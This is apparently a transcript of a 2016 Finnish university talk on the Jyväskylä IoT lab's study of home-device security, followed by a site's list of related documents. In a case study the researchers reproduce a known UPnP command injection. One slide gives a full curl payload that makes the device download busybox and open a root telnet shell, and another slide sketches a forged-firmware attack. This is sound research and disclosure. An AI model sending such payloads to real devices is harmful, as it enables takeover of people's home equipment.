Yliopiston IoT-laboratorio esineiden tietoturvaa Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto

Koko: px
Aloita esitys sivulta:

Download "Yliopiston IoT-laboratorio esineiden tietoturvaa. 19.5.2016 Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto tuomas.s.tenkanen@jyu."

Transkriptio

1 Yliopiston IoT-laboratorio esineiden tietoturvaa Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto

2 LaiTSo Jyväskylän yliopiston IoT-laboratorio on perustettu osana INKA EAKR Laiteläheinen tietoturvateknologia ja sovellutusmahdollisuudet (LaiTSo) -projektia. Projektin rahoittajina EAKR/Tekes, Jyväskylän yliopisto, Keski-Suomen liitto, Jyväskylän seudun kehittämisyhtiö Jykes, Pardco Group Oy ja Lookinno Oy. Vastuullisena johtajana dekaani Pekka Neittaanmäki, projektipäällikkönä Otto Hrad.

3 Internet of Things "A global infrastructure for the information society, enabling advanced services by interconnecting (physical and virtual) things based on existing and evolving interoperable information and communication technologies." ITU-T

4 Thing "With regard to the Internet of things, this is an object of the physical world (physical things) or the information world (virtual things), which is capable of being identified and integrated into communication networks." ITU-T Mikä tahansa verkkoon liitettävä laite. Yleensä ei perinteinen tietokone tai verkkolaite tietokoneen käsite hämärtyy IPv4/IPv6 (TCP, UDP, ICMP), mutta laajemmin ajateltuna myös muut verkkoteknologiat.

5 IoT-ennusteita Vuonna miljardia laitetta Gartner, Business Insider Vuonna (-100) miljardia laitetta McKinsey, Gartner, Business Insider Vertailuna 2016: 3,3 mrd internet-käyttäjää 1 mrd web-sivustoa Internet Live Stats

6 Automaatiojärjestelmät Suomalaisia automaatiojärjestelmiä suojaamattomana verkossa Viestintävirasto 2013, Tiilikainen & Manner n laitetta suojaamattomana verkossa Viestintävirasto etsii tietoverkoista suojaamattomia automaatiolaitteita Viestintävirasto 2015a Yhä suuri määrä suojaamattomia automaatiojärjestelmiä Viestintävirasto 2015b, Viestintävirasto 2015c ei merkittävää muutosta Viestintävirasto jatkaa selvityksiä automaatiojärjestelmien suojaamattomista yhteyksistä Viestintävirasto 2016 "Selvitys toteutetaan lähettämällä yhteydenavauspyyntöjä suomalaisissa verkoissa olevien tietokoneiden ja verkkolaitteiden tiettyihin tietoliikenneportteihin ja tarkkailemalla niistä tulevia vastausviestejä."

7 Jääkaappi hyökkää Tekniikka & Talous 2016 ilmalämpöpumppu valvontakamera lypsyrobotti viritinvahvistin laajakaistamodeemi mediatoistin roskaposti hajautettu palvelunestohyökkäys firmware-päivitykset ohjelmistopäivitykset salasanojen vaihtaminen tietoliikenneporttien vaihtaminen

8 JY:n IoT-laboratorio IoT-laboratorio on tutkimuslähtöinen laboratorioympäristö tukemaan tutkimusta, jossa laskenta-alusta on liitetty erilaisiin sensoreihin, laitteisiin ja tietoväyliin, joilla voidaan kerätä ja lukea tietoa, sekä luoda tutkimusta tukevia toimintaympäristöjä, ja jossa aiemmin kehitettyjä ratkaisuja voidaan edelleen kehittää erilaisiin ympäristöihin soveltuviksi sekä ottaa turvallisuusratkaisut osaksi kyberturvallisuuskoulutusta. Tarkoituksena luoda kotikäyttäjän verkkoa vastaava wlan-verkko, jossa voidaan tutkia kodin IoT-laitteiden tietoturvaa ja -liikennettä. Tutkimuksen kannalta oleellista saada kaapattua laitteilta tuleva ja laitteille menevä liikenne sekä voida tutkia pakettikaappauksia jälkikäteen. Pakettien kaappaaminen reitittimeltä, joten asennettiin pöytäkone reitittimeksi internetin ja wlan-verkon väliin. Tällöin kaappaus voidaan tehdä reititinkoneen verkkokortin kautta.

9 IoT-laboratorion verkko 4g-yhteys internetiin 4g-reititin Kali Linux -reititinkone liikenteen seuranta pakettikaappaukset Wlan-reititin

10 IoT-laboratorion laitteita

11 Case study Tutkittava laiteperhe sisältää etähallittavia kodin elektroniikkalaitteita. UPnP on joukko protokollia, joiden tarkoitus on saada erilaiset verkkolaitteet toimimaan helposti keskenään Laitteet lähettävät ja vastaanottavat UPnP-viestejä, joilla voidaan ohjata laitteiden toimintoja. UPnP ei protokollana sisällä autentikointia vaan esim. WeMo-laitteiden osalta käyttäjän on luotettava wlan-verkon suojaukseen Laitteet myös mainostavat verkkoon omia palveluitaan protokollan mukaisesti: esim. JY IoT-laboratorion laitteen palvelukuvaukset löytyvät osoitteesta

12 Tunnettu haavoittuvuus Tripwire/The State of Security julkaisi Bryon Hartin artikkelin My SecTor Story: Root Shell on the ###### Artikkelissa kuvataan miten tutkittavaan laitteeseen saadaan telnet-yhteys ja root-oikeudet UPnP-viestejä ja Linuxin command substitution -toiminnallisuutta hyödyntäen. Haavoittuvuus ei ollut suoraan toistettavissa laboratorion laitteilla, koska laitteista puuttui telnetd-ohjelma. Laboratoriossa pystyttiin kuitenkin suorittamaan komentoja laitteilla, esim. reboot-komennolla pystyttiin käynnistämään laite uudestaan.

13 Jatkotutkimuksia Jatkotutkimuksissa pyrittiin selvittämään mitä ohjelmia laboratorion laitteilla on asennettuna. Havaittiin, että esim. ls, ping ja wget ovat asennettuna ja sekä if- että for-kontrollirakenteet toimivat. Näillä tiedoilla pystyttiin varmistamaan, että komentoja voidaan todellakin ajaa ko. laitteilla ja saatiin lisää tietoja laitteista, mm. tiedostolistaukset http-pyyntöjen kautta: for a in ls /bin; do wget done. Lisäksi pystyttiin selvittämään laitteiden arkkitehtuuri ja siten etsimään oikean tyyppisiä ohjelmia ajettavaksi laitteilla. Havaittiin, että laitteet käyttävät riisuttua busybox-versiota komentotulkkina, minkä vuoksi telnetd-toimintoa ei ole käytettävissä. Asennettiin laboratorion verkkoon http-palvelin tarjoamaan täysi versio busyboxista mips-arkkitehtuurille. Ohjeistettiin UPnP-viestillä tutkittava laite hakemaan uusi busybox ja käynnistämään sillä telnetd laitteelle. Tämän jälkeen voitiin kirjautua telnetillä root-oikeuksin laitteeseen ja saatiin alkuperäinen haavoittuvuus vahvistettua.

14 Miten curl -0 -A '' -X POST -H 'Accept: ' -H 'Content-type: text/xml; charset="utf-8"' \ -H "SOAPACTION: \"urn:######:service:basicevent:1#setsmartdevinfo\"" \ --data '<?xml version="1.0" encoding="utf-8"?> \ <s:envelope xmlns:s=" \ s:encodingstyle=" \ <s:body><u:setsmartdevinfo xmlns:u="urn:######:service:basicevent:1"> \ <SmartDevURL>\ `cp /bin/busybox /tmp/busybox; \ wget \ cp /tmp/busybox /tmp/telnetd; \ cp /tmp/busybox /tmp/sh; \ /tmp/telnetd -l /tmp/sh`\ </SmartDevURL></u:SetSmartDevInfo></s:Body></s:Envelope>'\ -i

15 Hyökkäysskenaario Laitteissa firmware-päivitystoiminto ja päivittämättömistä laitteista saadaan koko tiedostojärjestelmä ulos. On mahdollista ladata laitteesta vanha firmwareversio, muokata sitä (esim. versionumero, tarjolla olevat ohjelmat, käynnistyessä ajettavat ohjelmat), allekirjoittaa muokattu firmware laitteisiin sisältyvällä avaimella ja tarjota väärää päivitystä olemassa oleville laitteille. Menetelmä ei ole yksinkertainen, mutta teoriassa mahdollistaa kaikkien saman tuoteperheen laitteiden haltuunottamisen.

16 Toinen haavoittuvuus saatiin vahvistettua, että myös toisen hyvin samankaltaisen UPnP-viestin käsittelyyn liittyy vastaava, aiemmin tuntematon haavoittuvuus. Valmistaja on korjannut molemmat URLosoitteiden käsittelyyn liittyvät haavoittuvuudet toukokuussa 2015 julkaistulla firmwarepäivityksellä. Laboratorion laitteet on hankittu marras-joulukuun 2015 aikana, joten kaupoissa on edelleen saatavilla haavoittuvia laitteita.

17 Yleisiä havaintoja kodin IoT-laitteista Edullisia Linux-pohjaisia toteutuksia, osa hyvinkin vanhoja Useimpien laitteiden suojaus perustuu vain ja ainoastaan verkon suojaukseen mikäli pääsy verkkoon, pääsy laitteille Laitteet voidaan kaataa esim. DOS-hyökkäyksillä. Laitteet saadaan pakotettua toiseen wlan-verkkoon. Joidenkin laitteiden tiedostojärjestelmät saadaan ulos suoraan tallennusvälineiltä muualle verkkoon (dd, ftpput) Laitteet hakevat kysymättä käyttäjän tietoja puhelimelta, jolla laitteita hallitaan. Laitteet lähettävät kysymättä tietoja valmistajalle. Laitteet vaikuttavat toimivan osittain epäluotettavasti ja arvaamattomasti. selkeästi ensimmäisen sukupolven laitteita Jotkut laitteet huomattavasti luotettavammin toteutettuja kuin toiset hinta ei korreloi

18 TIEA345, IoT-prototyypit Yhtenä tavoitteena LaiTSo-projektille ja siten IoTlaboratoriolle on kehittää opetusta IT-tiedekunnassa ja tietotekniikan laitoksella. Ensimmäisenä tuloksena kesäperiodissa 2016 järjestetään pilottitoteutus TIEA345 IoT-prototyypit - kurssista. "Kurssilla tutustutaan IoT-laitteisiin hands-on -tyylillä. Alustana Raspberry Pi sekä mahdollisesti muita. Kurssi suoritetaan käytännön demoilla, joissa kootaan toimiva laitekokonaisuus ja opetellaan lukemaan dataa sensoreilta sekä siirtämään sitä verkkoon."

19 Laitekirjasto IoT-laboratorion tavoitteisiin kuuluu myös muun tutkimuksen tukeminen ja tätä tarkoitusta varten perustetaan IoT-aiheinen laitekirjasto. Esimerkkinä laitekirjaston toiminnasta Raspberry Pi + SenseHAT -yhdistelmä liikunta-aktiivisuustutkimuksessa.

20 Kybertiimin muita tutkimusaiheita tilannetietoinen kyberturvallisuus tilannekuvajärjestelmät salatun liikenteen NIDS kriittisen infrastruktuurin turvaaminen hunajapurkit työkaluina haittaohjelma-analyysi DNS-tunnelointihyökkäysten analyysi

21 Lähteet Business Insider Gartner Internet Live Stats ITU-T McKinsey My SecTor Story Tekniikka & Talous Tiilikainen & Manner Viestintävirasto Viestintävirasto 2015a Viestintävirasto 2015b Viestintävirasto 2015c ssa_verkoissa.pdf Viestintävirasto

Langattoman kotiverkon mahdollisuudet

Langattoman kotiverkon mahdollisuudet Langattoman kotiverkon mahdollisuudet Tietoisku 5.4.2016 mikko.kaariainen@opisto.hel.fi Lataa tietoiskun materiaali netistä, kirjoita osoite selaimen osoitelokeroon: opi.opisto.hel.fi/mikko Tietoverkot

Lisätiedot

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi Twitter: @CyberFinland - ai miten niin? Twitter: @CyberFinland Twitter: @CyberFinland Twitter: @CyberFinland Twitter: @CyberFinland - miksi ihmeessä? Twitter: @CyberFinland Twitter: @CyberFinland Twitter:

Lisätiedot

TEEMME KYBERTURVASTA TOTTA

TEEMME KYBERTURVASTA TOTTA TEEMME KYBERTURVASTA TOTTA Petri Kairinen, CEO (twitter: @kairinen) Pörssin Avoimet Ovet 1.9.2015 1.9.2015 Nixu 2015 1 PIDÄMME DIGITAALISEN YHTEISKUNNAN TOIMINNASSA. 1.9.2015 Nixu 2015 2 DIGITAALINEN YHTEISKUNTA

Lisätiedot

Suojaamattomia automaatiolaitteita suomalaisissa verkoissa

Suojaamattomia automaatiolaitteita suomalaisissa verkoissa Suojaamattomia automaatiolaitteita suomalaisissa verkoissa 29.6.2015 Sisällysluettelo Suojaamattomia automaatiolaitteita suomalaisissa verkoissa... 3 Keskeisiä tuloksia ja havaintoja... 3 Mahdollisia uhkia...

Lisätiedot

TUTKI OMAT TIETOTURVA-AUKKOSI. ENNEN KUIN JOKU MUU TEKEE SEN PUOLESTASI. F-Secure Radar Ville Korhonen

TUTKI OMAT TIETOTURVA-AUKKOSI. ENNEN KUIN JOKU MUU TEKEE SEN PUOLESTASI. F-Secure Radar Ville Korhonen TUTKI OMAT TIETOTURVA-AUKKOSI. ENNEN KUIN JOKU MUU TEKEE SEN PUOLESTASI. F-Secure Radar Ville Korhonen ON OLEMASSA KAHDENLAISIA YRITYKSIÄ: 1. NE JOIHIN ON MURTAUDUTTU 2. NE JOTKA EIVÄT VIELÄ TIEDÄ SITÄ

Lisätiedot

Alatunniste

Alatunniste 1 I NTERNET OF THINGS = ESINEIDEN INTERNET Alatunniste 2 MIKÄ ON IOT/EIT? Internet of things Esineiden internet Määritelmä Jokainen sähköä käyttävä laite joka on kytketty verkkoon Jokaisella on oma osoitteensa

Lisätiedot

Raspberry Pi. Yhden piirilevyn tietokone. Tässä dokumentissa kerrotaan yleistä tietoa Rasberry Pi- tietokoneesta ja. sen toiminnoista.

Raspberry Pi. Yhden piirilevyn tietokone. Tässä dokumentissa kerrotaan yleistä tietoa Rasberry Pi- tietokoneesta ja. sen toiminnoista. Yhden piirilevyn tietokone Tässä dokumentissa kerrotaan yleistä tietoa Rasberry Pi- tietokoneesta ja sen toiminnoista. Sisällys Raspberry Pi Yleistä... 2 Teknistä... 2 Käyttöjärjestelmät... 4 Pelaaminen

Lisätiedot

Harjoituksen aiheena on tietokantapalvelimen asentaminen ja testaaminen. Asennetaan MySQL-tietokanta. Hieman linkkejä:

Harjoituksen aiheena on tietokantapalvelimen asentaminen ja testaaminen. Asennetaan MySQL-tietokanta. Hieman linkkejä: Linux-harjoitus 6 Harjoituksen aiheena on tietokantapalvelimen asentaminen ja testaaminen. Asennetaan MySQL-tietokanta. Hieman linkkejä: http://www.mysql.com/, MySQL-tietokantaohjelman kotisivu. http://www.mysql.com/doc/en/index.html,

Lisätiedot

Tietoverkkojen turvallisuus. Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2012

Tietoverkkojen turvallisuus. Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2012 Tietoverkkojen turvallisuus Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2012 Luennon sisältö 1. Palomuurit ja rajavalvonta NAT palomuurina Tilaton, tilallinen ja sovellustason palomuuri Virtuaaliverkkoyhteys

Lisätiedot

w4g Kotimokkula käyttöopas

w4g Kotimokkula käyttöopas w4g Kotimokkula käyttöopas 4G Kotimokkula on huippunopea reititin, jonka avulla voit liittää laitteita internetiin WLAN-verkkoa tai. Mukavin tapa käyttää Kotimokkulaa on liittää tietokone, matkapuhelin

Lisätiedot

Järjestelmän asetukset. Asetustiedostojen muokkaaminen. Pääkäyttäjä eli root. Järjestelmänhallinnan työkalut

Järjestelmän asetukset. Asetustiedostojen muokkaaminen. Pääkäyttäjä eli root. Järjestelmänhallinnan työkalut Järjestelmän asetukset Järjestelmänhallinnan työkalut Ubuntussa järjestelmän hallintaan ja asetusten muokkaamiseen tarkoitetut ohjelmat on koottu Järjestelmä-valikon alle Asetukset- ja Ylläpito -alavalikoista

Lisätiedot

Security server v6 installation requirements

Security server v6 installation requirements CSC Security server v6 installation requirements Security server version 6.4-0-201505291153 Pekka Muhonen 8/12/2015 Date Version Description 18.12.2014 0.1 Initial version 10.02.2015 0.2 Major changes

Lisätiedot

VALVO JA VARAUDU PAHIMPAAN

VALVO JA VARAUDU PAHIMPAAN VALVO JA VARAUDU PAHIMPAAN Erkki Sivonen Senior Account Manager Nordic LAN&WAN Communication erkki.sivonen@lanwan.fi 5/13/2015 5/13/2015 5/13/2015 1.10.2013 UUSI SÄHKÖMARKKINALAKI JATKUVUUDENHALLINNAN

Lisätiedot

Tietoturvallisuus yhteiskunnan, yritysten ja yksityishenkilöiden kannalta

Tietoturvallisuus yhteiskunnan, yritysten ja yksityishenkilöiden kannalta Tietoturvallisuus yhteiskunnan, yritysten ja yksityishenkilöiden kannalta Sähköurakoitsijapäivät 21.11.2013 Kari Wirman 7.11.2013 Kari Wirman 21.11.2013 Kari Wirman, ICT-pooli Tieto Tieto on nyky-yhteiskunnan

Lisätiedot

LINUX-HARJOITUS, MYSQL

LINUX-HARJOITUS, MYSQL LINUX-HARJOITUS, MYSQL Harjoituksen aiheena on tietokantapalvelimen asentaminen ja testaaminen. Asennetaan MySQL-tietokanta. Hieman linkkejä: http://www.mysql.com/, MySQL-tietokantaohjelman kotisivu. http://www.mysql.com/doc/en/index.html,

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Mac OS X

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Mac OS X Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet Käyttöjärjestelmä: Mac OS X Espoon Taloyhtiöverkot, 2010 Ohjeet laajakaistaverkon käyttöön ottamiseksi Tietokone kytketään huoneistossa olevaan ATK-rasiaan

Lisätiedot

Suojaamattomien automaatiolaitteiden kartoitus 2016

Suojaamattomien automaatiolaitteiden kartoitus 2016 Suojaamattomien automaatiolaitteiden kartoitus 2016 22.6.2016 Sisällysluettelo Suojaamattomia automaatiolaitteita suomalaisissa verkoissa... 3 1 Keskeisiä tuloksia ja havaintoja... 4 2 Muita kartoituksessa

Lisätiedot

KEMI-TORNIONLAAKSON KOULUTUSKUNTAYHTYMÄ LAPPIA LANGATON VIERAILIJAVERKKO 2(7) VERKKOYHTEYDEN MÄÄRITTELY WINDOWS XP:LLE (WINDOWS XP SP3)

KEMI-TORNIONLAAKSON KOULUTUSKUNTAYHTYMÄ LAPPIA LANGATON VIERAILIJAVERKKO 2(7) VERKKOYHTEYDEN MÄÄRITTELY WINDOWS XP:LLE (WINDOWS XP SP3) LANGATON VIERAILIJAVERKKO 1(7) LANGATTOMAN VIERAILIJAVERKON KÄYTTÖ Kemi-Tornionlaakson koulutuskuntayhtymä Lappia tarjoaa vierailijoiden, opiskelijoiden ja henkilökunnan käyttöön suojatun langattoman verkon

Lisätiedot

TEEMME KYBERTURVASTA TOTTA

TEEMME KYBERTURVASTA TOTTA TEEMME KYBERTURVASTA TOTTA Heikki Roikonen, talousjohtaja Arvopaperin Rahapäivä, Helsinki, 17.9.2015 17.9.2015 Nixu 2015 1 PIDÄMME DIGITAALISEN YHTEISKUNNAN TOIMINNASSA. 17.9.2015 Nixu 2015 2 DIGITAALINEN

Lisätiedot

Tietoa ja ohjeita Hämäläisten ylioppilassäätiön asuntoloiden laajakaistaverkon käytöstä

Tietoa ja ohjeita Hämäläisten ylioppilassäätiön asuntoloiden laajakaistaverkon käytöstä Tietoa ja ohjeita Hämäläisten ylioppilassäätiön asuntoloiden laajakaistaverkon käytöstä Release 1 versio 4 14.9.2006 Espoon Taloyhtiöverkot Oy, 2006 Sisällysluettelo Osa 1: Perustietoa verkosta...3 Osa

Lisätiedot

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Vepsäläinen, @pveps Jykes & Kyber-INKA, @CyberFinland 18.4.2016

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Vepsäläinen, @pveps Jykes & Kyber-INKA, @CyberFinland 18.4.2016 Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Vepsäläinen, @pveps Jykes & Kyber-INKA, @CyberFinland 18.4.2016 Tietojen kalastelua, nettihuijauksia, vai jotain muuta?? Tietojen

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Mac OS X

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Mac OS X Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Mac OS X Espoon Taloyhtiöverkot, 2010 Tervetuloa Espoon Taloyhtiöverkkojen laajakaistan käyttäjäksi! Tässä ohjeessa opastetaan,

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Windows XP

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Windows XP Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet Käyttöjärjestelmä: Windows XP Espoon Taloyhtiöverkot Oy, 2010 Tervetuloa Espoon Taloyhtiöverkkojen laajakaistan käyttäjäksi! Tässä ohjeessa opastetaan,

Lisätiedot

TIETOPAKETTI EI -KYBERIHMISILLE

TIETOPAKETTI EI -KYBERIHMISILLE TIETOPAKETTI EI -KYBERIHMISILLE Miksi TIEDOLLA on tässä yhtälössä niin suuri merkitys? Mitä tarkoittaa KYBERTURVALLISUUS? Piileekö KYBERUHKIA kaikkialla? Kaunis KYBERYMPÄRISTÖ? Miten TIETOJÄRJESTELMÄ liittyy

Lisätiedot

Jyväskylän kokemuksia

Jyväskylän kokemuksia Jyväskylän kokemuksia Investointeja ja kasvua yli rajojen 25.4.2012 Minna Haapala Jyväskylän seudun kehittämisyhtiö Jykes Oy Jykesin kansainvälistymispalvelut Jykesin kansainvälistymispalvelut tukee yritysten

Lisätiedot

Javan asennus ja ohjeita ongelmatilanteisiin

Javan asennus ja ohjeita ongelmatilanteisiin Javan asennus ja ohjeita ongelmatilanteisiin Javaa tarvitaan Fivaldin Sovellusikkunan alaisiin sovelluksiin, jotka käyttävät Oracle Forms -tekniikkaa. Visma Fivaldin osalta suosittelemme aina käyttämään

Lisätiedot

Internet ja tietoverkot 2015 Harjoitus 7: Kertaus

Internet ja tietoverkot 2015 Harjoitus 7: Kertaus Internet ja tietoverkot 2015 Harjoitus 7: Kertaus Tämän harjoituksen tarkoituksena on hieman kerrata TCP/IP-kerrosmallin sovelluskerroksen, kuljetuskerroksen, internet-kerroksen ja siirtoyhteyskerroksen

Lisätiedot

Lukio ja sähköiset ylioppilaskirjoitukset Tieto- ja viestintätekniikka selvitys 2014

Lukio ja sähköiset ylioppilaskirjoitukset Tieto- ja viestintätekniikka selvitys 2014 Lukio ja sähköiset ylioppilaskirjoitukset Tieto- ja viestintätekniikka selvitys 2014 Kurt Torsell Kartoituksen toteutus Suomen Kuntaliitto toteutti syksyllä 2013 ensimmäistä kertaa kouluille suunnatun

Lisätiedot

F-SECURE SAFE. Toukokuu 2017

F-SECURE SAFE. Toukokuu 2017 F-SECURE SAFE Toukokuu 2017 F-SECURE SAFE SUOJAA YHTEYTESI YKSI TURVA KAIKILLE LAITTEILLE Suojaa kaikki eri laitteesi - PC:t, Macit, puhelimet ja tabletit - yhdellä palvelulla. VIRUSTEN TORJUNTA Suojaa

Lisätiedot

Salausmenetelmät (ei käsitellä tällä kurssilla)

Salausmenetelmät (ei käsitellä tällä kurssilla) 6. Internetin turvattomuus ja palomuuri Internetin turvaongelmia Tietojen keruu turva-aukkojen löytämiseksi ja koneen valtaaminen Internetissä kulkevan tiedon tutkiminen IP-osoitteen väärentäminen Palvelunestohyökkäykset

Lisätiedot

Suomen kyberturvallisuusstrategia ja toimeenpano-ohjelma Jari Pajunen Turvallisuuskomitean sihteeristö

Suomen kyberturvallisuusstrategia ja toimeenpano-ohjelma Jari Pajunen Turvallisuuskomitean sihteeristö Suomen kyberturvallisuusstrategia ja toimeenpano-ohjelma Jari Pajunen Turvallisuuskomitean sihteeristö 7.2.2014 1 Taloussanomat/It-viikko uutisoi 17.1.2014 "Jääkaappi osallistui roskapostin lähettämiseen

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows XP

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows XP Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows XP Espoon Taloyhtiöverkot Oy, 2010 Tervetuloa Espoon Taloyhtiöverkkojen laajakaistan käyttäjäksi! Tässä ohjeessa

Lisätiedot

Security server v6 installation requirements

Security server v6 installation requirements CSC Security server v6 installation requirements Security server version 6.x. Version 0.2 Pekka Muhonen 2/10/2015 Date Version Description 18.12.2014 0.1 Initial version 10.02.2015 0.2 Major changes Contents

Lisätiedot

Kodin automatisointi - Kehitystrendejä

Kodin automatisointi - Kehitystrendejä Kodin automatisointi - Kehitystrendejä TTY:Tietoverkkopohjainen automaatio Kodin automaation tasoja Yksittäinen, paikallinen (Stand-alone) automaatiolaite Integroitu kotiautomaatiojärjestelmä Kotiverkon

Lisätiedot

Metropolia Ammattikorkeakoulu

Metropolia Ammattikorkeakoulu Metropolia Ammattikorkeakoulu UNIX-käyttöjärjestelmä TX00BW20 Sami Sainio sami.sainio@metropolia.fi Kurssin rakenne ja arvostelu 7 x luennot ja laboratorioharjoitukset Pieni projekti? Kurssin lopussa tentti

Lisätiedot

BigData - liikenne esimerkkinä. Tietoyhteiskunta-akatemia Ostrobotnia, Helsinki 14.3.2016

BigData - liikenne esimerkkinä. Tietoyhteiskunta-akatemia Ostrobotnia, Helsinki 14.3.2016 BigData - liikenne esimerkkinä Tietoyhteiskunta-akatemia Ostrobotnia, Helsinki 14.3.2016 Public Dig Data & Internet of Things Liikenne esimerkkinä Tieto Corporation Public @LeilaLehtinen Leila.Lehtinen@tieto.com

Lisätiedot

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi - ai miten niin? - miksi ihmeessä? Kyberturvallisuus - miksi ihmeessä? Kyberrikollisuus Kyberrikollisuudessa vuotuisesti liikkuvan rahan määrä on ylittänyt huumausainerikollisuudessa vuotuisesti

Lisätiedot

Sulautettu tietotekniikka 2007 2013 Kimmo Ahola

Sulautettu tietotekniikka 2007 2013 Kimmo Ahola M2M - uutta liiketoimintaa ja rahoitusta - työpaja 19.2.2013, Tampere Sulautettu tietotekniikka 2007 2013 Kimmo Ahola Ubicom ohjelman päällikkö, Twitter: @KimmoAhola Helmikuu 2013 Ubicom Embedded ICT Finland

Lisätiedot

Siirtyminen IPv6 yhteyskäytäntöön

Siirtyminen IPv6 yhteyskäytäntöön Siirtyminen yhteyskäytäntöön SimuNet loppuseminaari 7.12.2011 Vesa Kankare 7.12.2011 1 Agenda Taustaa Miksi Muutoksen vaikutukset verkoille operaattori ja yritysnäkökulma SimuNet 7.12.2011 2 IPv4 IPv4

Lisätiedot

MARA-ALAN LIIKETOIMINNAN TIETOTURVALLISUUSUHAT

MARA-ALAN LIIKETOIMINNAN TIETOTURVALLISUUSUHAT MARA-ALAN LIIKETOIMINNAN TIETOTURVALLISUUSUHAT 1 Yritysesittely Smart Idea MARA-alan ITpalvelutoimittaja erikoistunut kassajärjestelmiin, maksupäätteisiin ja ravintolaverkkoihin. SKJ Systems - luo asiakkailleen

Lisätiedot

Kyberturvallisuus on digitalisaation edellytys ja mahdollistaja - miksi ja miten?

Kyberturvallisuus on digitalisaation edellytys ja mahdollistaja - miksi ja miten? Kyberturvallisuus on digitalisaation edellytys ja mahdollistaja - miksi ja miten? 20.11.2015 Kimmo Rousku, VAHTI-pääsihteeri Julkisen hallinnon ICT-toiminto Kyberturvallisuus- ja infrastruktuuriyksikkö

Lisätiedot

Käyttöoppaasi. F-SECURE MOBILE SECURITY 6 FOR ANDROID http://fi.yourpdfguides.com/dref/2859496

Käyttöoppaasi. F-SECURE MOBILE SECURITY 6 FOR ANDROID http://fi.yourpdfguides.com/dref/2859496 Voit lukea suosituksia käyttäjän oppaista, teknisistä ohjeista tai asennusohjeista tuotteelle F-SECURE MOBILE SECURITY 6 FOR ANDROID. Löydät kysymyksiisi vastaukset F-SECURE MOBILE SECURITY 6 FOR ANDROID

Lisätiedot

WELHO ADSL -LAAJAKAISTAPALVELUIDEN PALVELUKUVAUS KULUTTAJA-ASIAKKAILLE (alkaen 24.8.2010)

WELHO ADSL -LAAJAKAISTAPALVELUIDEN PALVELUKUVAUS KULUTTAJA-ASIAKKAILLE (alkaen 24.8.2010) WELHO ADSL -LAAJAKAISTAPALVELUIDEN PALVELUKUVAUS KULUTTAJA-ASIAKKAILLE (alkaen 24.8.2010) WELHO-LAAJAKAISTAPALVELUIDEN PALVELUKUVAUS KULUTTAJA-ASIAKKAILLE (alkaen 19.5.2010) 2 (3) WELHO-LAAJAKAISTAPALVELUIDEN

Lisätiedot

Turvaa langattomat laitteesi ja verkkosi. Harri Koskinen Rossum Oy www.rossum.fi

Turvaa langattomat laitteesi ja verkkosi. Harri Koskinen Rossum Oy www.rossum.fi Turvaa langattomat laitteesi ja verkkosi Harri Koskinen Rossum Oy www.rossum.fi Aiheet Rossum Oy lyhyesti Langattomien verkkojen lyhyt yleiskatsaus Langattomien verkkojen turvallisuus Turvallisuuden arviointi

Lisätiedot

1. päivä ip Windows 2003 Server ja vista (toteutus)

1. päivä ip Windows 2003 Server ja vista (toteutus) 1. päivä ip Windows 2003 Server ja vista (toteutus) Olette pomosi kanssa tarkastaneet asiakkaan tekemän ja sinun korjaaman suunnitelman ja tehneet oman versionsa siitä. Noudata siis tätä tekemäänne uutta

Lisätiedot

Internet Protocol version 6. IPv6

Internet Protocol version 6. IPv6 Internet Protocol version 6 IPv6 IPv6 Osoiteavaruus 32-bittisestä 128-bittiseksi Otsikkokentässä vähemmän kenttiä Lisäominaisuuksien määritteleminen mahdollista Pakettien salaus ja autentikointi mahdollista

Lisätiedot

Verkostoautomaatiojärjestelmien tietoturva

Verkostoautomaatiojärjestelmien tietoturva Verkostoautomaatiojärjestelmien tietoturva Jouko Tervo Sähkötutkimuspoolin seminaari 9.10.2013 1 Renecon palvelut Toiminnan kehittäminen ICTjärjestelmien ja palvelujen hankinnat Selvitykset ja tutkimukset

Lisätiedot

TEEMME KYBERTURVASTA TOTTA

TEEMME KYBERTURVASTA TOTTA TEEMME KYBERTURVASTA TOTTA Petri Kairinen, CEO (twitter: @kairinen) Pörssin Avoimet Ovet 1.9.2015 1.9.2015 Nixu 2015 1 PIDÄMME DIGITAALISEN YHTEISKUNNAN TOIMINNASSA. 1.9.2015 Nixu 2015 2 DIGITAALINEN YHTEISKUNTA

Lisätiedot

Tietoverkkojen turvallisuus. Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2011

